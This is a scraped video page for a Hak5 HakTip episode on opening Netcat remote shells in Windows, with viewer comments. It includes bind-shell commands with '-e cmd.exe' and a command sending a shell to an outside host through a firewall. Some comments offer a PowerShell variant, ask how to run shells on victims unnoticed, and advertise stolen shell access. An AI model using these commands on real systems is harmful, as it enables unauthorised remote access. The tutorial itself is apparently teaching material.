Netcat 101: Remote Shells in Windows, HakTip 86
ฝัง
- เผยแพร่เมื่อ 23 ก.ค. 2024
- Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:
____________________________________________
This week on HakTip Shannon is creating remote shells with Netcat in Windows!
Welcome to HakTip -- the show where we break down concepts, tools and techniques for hackers, gurus and IT ninjas. I'm Shannon Morse and today i'm creating remote shells with Netcat in Windows!
What is a remote shell? This is a command line computer program that you can use on all operating systems, that can execute shell commands as another user and on another computer, even on a different network. The remote system connects and runs a remote shell daemon, using a common TCP port. This is where we get into a real world scenario. You can use a remote shell to target a computer for nefarious purposes, or to do real world good- like logging files or troubleshooting.
While I'm not going to show you how to get a victim to start a shell on their computer without their knowledge, I will show you how to do a legit remote shell for white hat use. Let's go ahead and prepare the Windows machine for a remote shell. Open your command prompt and change to your Netcat directory. Type the following command:
* nc --Lp 31337 --vv --e cmd.exe
This will open netcat. -Lp will put it in a persistant listening mode. So if you close Netcat on one machine, this listener port will stay open indefinitely listening for a new entry. -vv tells Netcat to be extra verbose with outputs, which will be useful for file transfers, etc. -e opens the "gaping security hole", and cmd.exe is telling Netcat that this executable will be available on a remote machine.
Now, on my Linux machine I'm going to connect to the target computer with this command:
* nc 10.73.31.59 31337
This opens Netcat, connects to my Windows on port 31337. Now once it connects I can do things! I can type dir /w to see a directory listing on the computer. I can make a new directory with md MyDirectory. On my Windows machine I can see the new directory and make sure it's been created with dir /w again on the Linux pc.
Netcat can also run a remote shell from another port through a server outside of a firewall. So I could run this command: nc hak5.wifipineapple.com 80 -e cmd.exe then I could make an unencrypted tunnel from the outside world. Easy!
Do you use Netcat? Send me a comment below or email us at tips@hak5.org.
And be sure to check out our sister show, Hak5 for more great stuff just like this. I'll be there, reminding you to trust your technolust.
The HakShop is Hak5's premiere store for all of your pen testing needs, including one of my favorites - The USB Rubber Ducky - which looks like a flashdrive and types like a keyboard. It can type scripts into a computer rediculously quickly... Like my new fav. from forum user N3W that reverses your mouse left and right buttons:
DELAY 4000
GUI r
DELAY 100
STRING RUNDLL32 USER32.DLL,SwapMouseButton
DELAY 200
ENTER
This is great for pranking your coworkers!
We couldn't do this show without your support, so we'd like to thank you with something special:
Use coupon code "Snubs" with any order for your very own signed HakTip stickers. Thanks for supporting the show!
~-~~-~~~-~~-~
Please watch: "Bash Bunny Primer - Hak5 2225"
• Bash Bunny Primer - Ha...
~-~~-~~~-~~-~
____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community - where all hackers belong. - วิทยาศาสตร์และเทคโนโลยี
shannon i use and love netcat because it is so much easier to create a backdoor , chat server and client banner grab and just network in general it is just relieving thank u hak5
I think it's great that you did this for episode 86 as in x86 shells. lol.
If you're connecting from a Windows PC to a Windows PC, the PsTools suite of SysInternals is really useful. If remoteregistry is active on the target you can use psexec to do this exact thing.
Nice tutorial Shannon, thank you.
Is USB Rubber Ducky waterproof so it may be used in the bathtub?
no when i ordered mine it wasn't a rubber ducky at all !! it was a stupid flash drive ugh RIPOFF
Received mine the other day, successfully got into bath with rubber ducky, now am root@bathroom:~.
Bill ischill lmao
only one way to tell
Hi. Thank you for all the videos!. I have a problem... when I try to creat a new directory on Windows... it displays "Access denied". ¿Why?
You should use "nc -Lp 31337 -vv -e powershell.exe" instead for more power. If you run this listener from an elevated prompt, powershell will also run elevated. You can check if the remote powershell is admin with the following code:
([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
If you use ncat, the command is "ncat -lkp 31337 -vv -e powershell.exe" where -k is used to make -l persistent.
I read about that
can i use my raspberry pi3 like a little server connected to internet and use it for running programs written with an ipad and then sent to that raspberry for executing them and taking back the result? is there a way for doing that? or something else?
I only use netcat for remote testing whether ports are open because it's quicker than telnet and netmap is banned where I work. I knew you could set it up to listen on a port but didn't know about the -e switch until now.
you are a queen ,thank you,kee grinding in these hard days...
Wouldn't work through my WLAN? Firewall was off and sharing was wide-open on each computer, any ideas?
awesome tutorial Shannon :)
Hey guys, I don't know if you are aware of the shell replacement called Cygwin, It's amazing if you are used to linux/unix tools and commands and you can still use it with tools such as SSH you can remote shell without putty as well as get a great terminal for windows.
so why everytime i try to install NC wont let me, this was on windows vista
Nice very informative 👍
waiting for netcat 102 and 103
thx for video
nice one... can i execute a pop message using a netcat?
Hmm... just to answer your question Shannon Morse
What I wouldi love to see you doing showing us different methods to how to make someone run that shell whithout them knowing 3:) Haha
Till next time ;)
What linux os do you use? I like it...
How can I see the content of a file if I know the ip address and the port # and also the password. Have home work problem.
Where did you download netcat for windows. I can't find one that seems legitimate. Nmap has something, but it's not the same thing. It's their version of it, and it doesn't work on my machine.
The only other two places I've found are questionable at best, and both sites report multiple people detecting malware on the programs.
So, where did you get your netcat program from?
We’re in Ghana, how can we buy from Hak5 since my country doesn’t accept PayPal
can you use bash ???
Hi, mam I have a query that I want to select text on the terminal and copy & past how can do this if you know. Please tell me.
Use "ctrl+shift+c" to copy selected string in terminal
And use "ctrl+shift+v" to paste string (from clipboard) in terminal
I feel that putty is much easy for this purpose.
I was kinda hoping you would go over where to get netcat on windows
if you code a c++ programe that download nc and start the command
Do hak5 still have hacking challenges?
i try to connect and it spits out (UNKNOWN) [(my ip)] 31337 (?) : Connection refused
what does this mean and how can i fix it? im doing it all on my own machines
check your firewall, real time protection, etc
I really enjoy your videos. I am a worker who tries to keep good records of my work though my backup computers are older versions of Windows..Will this work across '98, XP, Windows 95 etc ? And also, on your example, for connecting from " outside" would I type like "nc 234.33.56.26 80" if that were my address?
Yes it should work on those older systems. As for the WAN connection, you have to forward your listening port which in your case would be "80", that is for HTTP.
oh my .. so, with nc I can actually hack into someone else's computer? Is it really easy like that (I'm a newbie who has just installed ubuntu)
everytime i do this it cant connect to the windows machine.
Ive tried like 8 different tutorials with different methods made my own method done hours upon hours of testing and i cant get this to work. i do the same thing as the video but when i connect from the linux machine nothing happens it just keeps listening. ive tried different windows machines and powershell please help
works like a charm! bro you just have to know what your doing.
FLEKS WALKER yeah i forgot i commented this, i figured it out, safe to say i did not know what i was doing 8 months ago lol
I’m following your steps but I get a connection refused
Any help? Thanks
Probably firewall
Show me how to log cookies and cache from a browser!
Can't we do it without Linux OS !?? I have only Windows 10
Net cat is best
This does not work sometimes. Why it is so ??
can you do it the other way
Created python script that opens a server with port 4444 and an created my own unique acryption alghorthm connect to it via python script that uses netcat and encrypts messages. Hacked into win10, and linux . My first attack that i built everything.
So you...created your own "unique acryption algorthm"........righttttt.....
i love you
second comment :D nice tutorial ty
thanks sweetness
3:07 there is command you write why prepare ducky when you can write samething on victim machine bcoz it was open lol
nc -h dos not work
my netcat doesn't have the -e option. why is this?
Same here !!
maybe it's the version of netcat or your operating system
Go download netcat for window and use wine that works
wget agirllikeher -o gf
ping agirllikeher
...
...
...
No response....
//this lol
First comment :)
you cant use these on windows now that all av including defender blocks nc. goodluck setting listeners, that wont work
te amo you mujer hermosa
Yes netcat isn't secure so you could use cryptcat instead.
ooh ...now i really want to know the black hat stuff she didn't want to show.
If I type "md MyHirDir" it's probably for girly pictures, or it might be a catalog of mistakes. Pictures of exes?
WTF you can connect to a socket with command prompt 😂. A shell with ps1, ok but a shell with command prompt wtf. Reverse_tcp ?
skype: unel carlos => sell : cPanel-webmail-smtp-shell-ftp-mailer-..etc..
ping
It’s not obvious at all that she’s reading this off the screen.
Windows 8 Fail !
I can't complain, I didn't pay for the laptop.
Not showing how to get a victim that will automatically execute Netcat, and this is why I wonder why they're called "Hak5". Yes, Netcat is good for learning the basics of shells, but no one is going to use Netcat for "white hat file transfers".
Actually NO. Try copying a 80-200GB file to another machine. Tedious stuff eh? Right now... send the file via NC.... Notice anything? Not having to deal with smb or nfs file overhead is SHOCKINGLY faster!
So as long as the NC connection isn't detected...
you use a tool already compiled and opensource you use it as a malicious backdoor and remote shell, it is a method of lamer, I work for a French company search for malware and really netcat a backdoor is not great .. most people looking to create backdoors that works on the internet and not in a local network such as LAN .. for use in WAN ports must be opened on the router and on the victim's! and remember that this is not a reverse shell! so if your victim is a local example for your VPN and intrusion test is in LAN and you do not know the local IP address of the target .. this attack is useless .. sorry for this comment but this tutorial apartment is useless to have a access to the server or another. PS: netcat with the -e option is detected as a virus..
+Tuto PC , okay sir, but these are NetCat tutorials not a "Perfect Backdoor tutorial". So for a beginner, this is a perfect video to know what is a backdoor or how it works. PS: there is a lot of polymorphics engines that change the netcat's binary code (so it won't be detected as a virus).
Everything you said is true, but you this is not the right place to write down your comment.